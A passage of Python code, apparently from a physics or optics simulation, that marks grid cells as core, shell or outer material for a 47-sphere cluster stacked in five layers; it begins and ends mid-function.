if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx29/(div))**2+(yy29/(div))**2+(zz29/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx30/(div))**2+(yy30/(div))**2+(zz30/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx31/(div))**2+(yy31/(div))**2+(zz31/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx32/(div))**2+(yy32/(div))**2+(zz32/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx33/(div))**2+(yy33/(div))**2+(zz33/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
##################################################################################################################################
###########################################################################################################################
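# hex9: fills the grid matrix A for what appears to be a 47-sphere cluster stacked in five
# layers (19 + 14 + 9 + 4 + 1 centers, judging from the xx1..xx47 definitions below). For each
# grid cell the squared distance cc to every sphere center is computed and normalized by the
# outer radius radiusc. Since radiuscore + (radiusc - radiuscore) == radiusc, the repeated tests
# below reduce to:
#   cc <= (radiuscore/radiusc)**2                              -> core material  (corenumber)
#   (radiuscore/radiusc)**2 <= cc <= (radiusshell/radiusc)**2  -> shell material (shellnumber)
#   (radiusshell/radiusc)**2 <= cc <= 1.0                      -> outer layer    (cnum)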
def hex9 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
xx1=((6)*radiusc/dl-i+1)
yy1= ((7)*radiusc/dl-j+1)
zz1=(radiusc/dl-k+1)
xx2=((6-1.0)*radiusc/dl-i+1)
yy2= ((7-sqrt(3.0))*radiusc/dl-j+1)
zz2=(radiusc/dl-k+1)
xx3=((6+1.0)*radiusc/dl-i+1)
yy3= ((7-sqrt(3.0))*radiusc/dl-j+1)
zz3=(radiusc/dl-k+1)
xx4=((6-1.0)*radiusc/dl-i+1)
yy4= ((7+sqrt(3.0))*radiusc/dl-j+1)
zz4=(radiusc/dl-k+1)
xx5=((6+1.0)*radiusc/dl-i+1)
yy5= ((7+sqrt(3.0))*radiusc/dl-j+1)
zz5=(radiusc/dl-k+1)
xx6=(4*radiusc/dl-i+1)
yy6= (7*radiusc/dl-j+1)
zz6=(radiusc/dl-k+1)
xx7=(8*radiusc/dl-i+1)
yy7= (7*radiusc/dl-j+1)
zz7=(1*radiusc/dl-k+1)
xx8=((6)*radiusc/dl-i+1)
yy8= ((9+sqrt(2.0))*radiusc/dl-j+1)
zz8=(1*radiusc/dl-k+1)
xx9=((6)*radiusc/dl-i+1)
yy9= ((5-sqrt(2.0))*radiusc/dl-j+1)
zz9=(1*radiusc/dl-k+1)
xx10=((10.0)*radiusc/dl-i+1)
yy10= ((7.0)*radiusc/dl-j+1)
zz10=(1*radiusc/dl-k+1)
xx11=((3-1.0)*radiusc/dl-i+1)
yy11= ((7.0)*radiusc/dl-j+1)
zz11=(1*radiusc/dl-k+1)
xx12=((3)*radiusc/dl-i+1)
yy12= ((7-sqrt(3.0))*radiusc/dl-j+1)
zz12=(1*radiusc/dl-k+1)
xx13=(9*radiusc/dl-i+1)
yy13= ((7-sqrt(3.0))*radiusc/dl-j+1)
zz13=(1*radiusc/dl-k+1)
xx14=((9+0.05)*radiusc/dl-i+1)
yy14= ((7+sqrt(3.0))*radiusc/dl-j+1)
zz14=(1*radiusc/dl-k+1)
xx15=((3)*radiusc/dl-i+1)
yy15= ((7+sqrt(3.0))*radiusc/dl-j+1)
zz15=((1)*radiusc/dl-k+1)
xx16=((3+1+0.05)*radiusc/dl-i+1)
yy16= ((12-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz16=((1)*radiusc/dl-k+1)
xx17=((8)*radiusc/dl-i+1)
yy17= ((12-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz17=((1)*radiusc/dl-k+1)
xx18=((8)*radiusc/dl-i+1)
yy18= ((2+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz18=((1)*radiusc/dl-k+1)
xx19=((4)*radiusc/dl-i+1)
yy19= ((2+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz19=((1)*radiusc/dl-k+1)
# second layer
xx20=((5)*radiusc/dl-i+1)
yy20= ((7)*radiusc/dl-j+1)
zz20=((1+sqrt(3.0))*radiusc/dl-k+1)
xx21=((7)*radiusc/dl-i+1)
yy21= ((7)*radiusc/dl-j+1)
zz21=((1+sqrt(3.0))*radiusc/dl-k+1)
xx22=((6)*radiusc/dl-i+1)
yy22= ((8+sqrt(2.0)/2)*radiusc/dl-j+1)
zz22=((1+sqrt(3.0))*radiusc/dl-k+1)
xx23=((6)*radiusc/dl-i+1)
yy23= ((6-sqrt(2.0)/2)*radiusc/dl-j+1)
zz23=((1+sqrt(3.0))*radiusc/dl-k+1)
xx24=((3.0)*radiusc/dl-i+1)
yy24= ((7)*radiusc/dl-j+1)
zz24=((1+sqrt(3.0))*radiusc/dl-k+1)
xx25=(9*radiusc/dl-i+1)
yy25= (7*radiusc/dl-j+1)
zz25=((1+sqrt(3.0))*radiusc/dl-k+1)
xx26=((8)*radiusc/dl-i+1)
yy26= ((8+sqrt(2.0)/2)*radiusc/dl-j+1)
zz26=((1+sqrt(3.0))*radiusc/dl-k+1)
xx27=((4)*radiusc/dl-i+1)
yy27= ((8+sqrt(2.0)/2)*radiusc/dl-j+1)
zz27=((1+sqrt(3.0))*radiusc/dl-k+1)
xx28=((8.0)*radiusc/dl-i+1)
yy28= ((6.0-sqrt(2.0)/2)*radiusc/dl-j+1)
zz28=((1+sqrt(3.0))*radiusc/dl-k+1)
xx29=((4.0)*radiusc/dl-i+1)
yy29= ((6.0-sqrt(2.0)/2)*radiusc/dl-j+1)
zz29=((1+sqrt(3.0))*radiusc/dl-k+1)
xx30=((5)*radiusc/dl-i+1)
yy30= ((8+sqrt(2.0)/2+sqrt(3.0))*radiusc/dl-j+1)
zz30=((1+sqrt(3.0))*radiusc/dl-k+1)
xx31=((7.0)*radiusc/dl-i+1)
yy31= ((8.0+sqrt(2.0)/2+sqrt(3.0))*radiusc/dl-j+1)
zz31=((1+sqrt(3.0))*radiusc/dl-k+1)
xx32=((5)*radiusc/dl-i+1)
yy32= ((6-sqrt(2.0)/2-sqrt(3.0))*radiusc/dl-j+1)
zz32=((1+sqrt(3.0))*radiusc/dl-k+1)
xx33=((7.0)*radiusc/dl-i+1)
yy33= ((6.0-sqrt(2.0)/2-sqrt(3.0))*radiusc/dl-j+1)
zz33=((1+sqrt(3.0))*radiusc/dl-k+1)
# third layer
xx34=((4.0)*radiusc/dl-i+1)
yy34= ((7.0)*radiusc/dl-j+1)
zz34=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx35=((6)*radiusc/dl-i+1)
yy35= ((7)*radiusc/dl-j+1)
zz35=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx36=((8.0)*radiusc/dl-i+1)
yy36= ((7.0)*radiusc/dl-j+1)
zz36=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx37=((7.0)*radiusc/dl-i+1)
yy37= ((8.0+sqrt(2.0)/2)*radiusc/dl-j+1)
zz37=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx38=((5)*radiusc/dl-i+1)
yy38= ((8+sqrt(2.0)/2)*radiusc/dl-j+1)
zz38=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx39=((7.0)*radiusc/dl-i+1)
yy39= ((6.0-sqrt(2.0)/2)*radiusc/dl-j+1)
zz39=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx40=((5.0)*radiusc/dl-i+1)
yy40= ((6.0-sqrt(2.0)/2)*radiusc/dl-j+1)
zz40=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx41=((6)*radiusc/dl-i+1)
yy41= ((8+sqrt(2.0)/2+sqrt(3.0))*radiusc/dl-j+1)
zz41=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx42=((6.0)*radiusc/dl-i+1)
yy42= ((6.0-sqrt(2.0)/2-sqrt(3.0))*radiusc/dl-j+1)
zz42=((1+2*sqrt(3.0))*radiusc/dl-k+1)
# fourth layer
xx43=((5)*radiusc/dl-i+1)
yy43= ((7.0)*radiusc/dl-j+1)
zz43=((1+3*sqrt(3.0))*radiusc/dl-k+1)
xx44=((7.0)*radiusc/dl-i+1)
yy44= ((7.0)*radiusc/dl-j+1)
zz44=((1+3*sqrt(3.0))*radiusc/dl-k+1)
xx45=((6)*radiusc/dl-i+1)
yy45= ((7+sqrt(3.0))*radiusc/dl-j+1)
zz45=((1+3*sqrt(3.0))*radiusc/dl-k+1)
xx46=((6.0)*radiusc/dl-i+1)
yy46= ((7-sqrt(3.0))*radiusc/dl-j+1)
zz46=((1+3*sqrt(3.0))*radiusc/dl-k+1)
# fifth layer
xx47=((6.0)*radiusc/dl-i+1)
yy47= ((7.0)*radiusc/dl-j+1)
zz47=((1+4*sqrt(3.0))*radiusc/dl-k+1)
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print (xx11,yy11,zz11,3+sqrt(3.0),float(radiusc/dl))
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
# print('here')
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx15/(div))**2+(yy15/(div))**2+(zz15/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx16/(div))**2+(yy16/(div))**2+(zz16/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx17/(div))**2+(yy17/(div))**2+(zz17/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx18/(div))**2+(yy18/(div))**2+(zz18/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx19/(div))**2+(yy19/(div))**2+(zz19/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx20/(div))**2+(yy20/(div))**2+(zz20/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx21/(div))**2+(yy21/(div))**2+(zz21/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx22/(div))**2+(yy22/(div))**2+(zz22/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx23/(div))**2+(yy23/(div))**2+(zz23/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx24/(div))**2+(yy24/(div))**2+(zz24/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx25/(div))**2+(yy25/(div))**2+(zz25/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx26/(div))**2+(yy26/(div))**2+(zz26/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx27/(div))**2+(yy27/(div))**2+(zz27/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx28/(div))**2+(yy28/(div))**2+(zz28/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx29/(div))**2+(yy29/(div))**2+(zz29/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx30/(div))**2+(yy30/(div))**2+(zz30/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx31/(div))**2+(yy31/(div))**2+(zz31/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx32/(div))**2+(yy32/(div))**2+(zz32/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx33/(div))**2+(yy33/(div))**2+(zz33/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx34/(div))**2+(yy34/(div))**2+(zz34/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx35/(div))**2+(yy35/(div))**2+(zz35/(div))**2) )
